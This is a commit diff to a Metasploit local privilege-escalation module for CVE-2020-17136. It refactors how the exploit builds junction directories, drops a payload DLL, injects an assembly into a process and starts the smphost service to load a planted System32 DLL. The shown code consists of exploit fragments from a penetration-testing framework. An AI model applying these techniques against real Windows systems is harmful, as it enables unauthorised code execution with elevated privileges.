Fix up code to use built in cd() and mkdir() commands, and adjust code to not overwrite datastore hash. Also use service_hash over manually starting the service.

2024-10-09 04:26:11 +02:00 · 2021-01-07 17:39:30 -06:00 · 2021-01-07 17:39:30 -06:00 · d5bb36c530
commit d5bb36c530
parent 3e52debd8b
1 changed files with 10 additions and 10 deletions
--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Dotnet
+  include Msf::Post::Windows::Services
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

@ -157,7 +158,8 @@ class MetasploitModule < Msf::Exploit::Local
    intermediate_dir = rand_text_alpha(10).to_s
    junction_dir = rand_text_alpha(10).to_s

-    cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
+    cd(dir_junct_path)
+    mkdir(intermediate_dir)
    if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
    end
@ -185,10 +187,9 @@ class MetasploitModule < Msf::Exploit::Local
    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
    write_file(payload_path, generate_payload_dll)
-    datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
    register_file_for_cleanup(payload_path)
-    execute_assembly(exe_path)
-    cmd_exec('net start smphost')
+    execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
+    service_start('smphost')
    register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
  end

@ -237,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Local
    [exploit_mem, offset]
  end

-  def execute_assembly(exe_path)
+  def execute_assembly(exe_path, exe_args)
    if sysinfo.nil?
      fail_with(Failure::BadConfig, 'Session invalid')
    else
@ -250,14 +251,13 @@ class MetasploitModule < Msf::Exploit::Local
    process, hprocess = launch_process
    exploit_mem, offset = inject_hostclr_dll(hprocess)

-    assembly_mem = copy_assembly(exe_path, hprocess)
+    assembly_mem = copy_assembly(exe_path, hprocess, exe_args)

    print_status('Executing...')
    hprocess.thread.create(exploit_mem + offset, assembly_mem)

-    sleep(datastore['WAIT']) if datastore['WAIT'].positive?
-
    if datastore['WAIT'].positive?
+      sleep(datastore['WAIT'])
      read_output(process)
    end

@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Local
    print_good('Execution finished.')
  end

-  def copy_assembly(exe_path, process)
+  def copy_assembly(exe_path, process, exe_args)
    print_status("Host injected. Copy assembly into #{process.pid}...")
    int_param_size = 8
    sign_flag_size = 1
@ -278,7 +278,7 @@ class MetasploitModule < Msf::Exploit::Local
    assembly_size = File.size(exe_path)

    cln_params = ''
-    cln_params << datastore['ARGUMENTS']
+    cln_params << exe_args
    cln_params << "\x00"

    payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size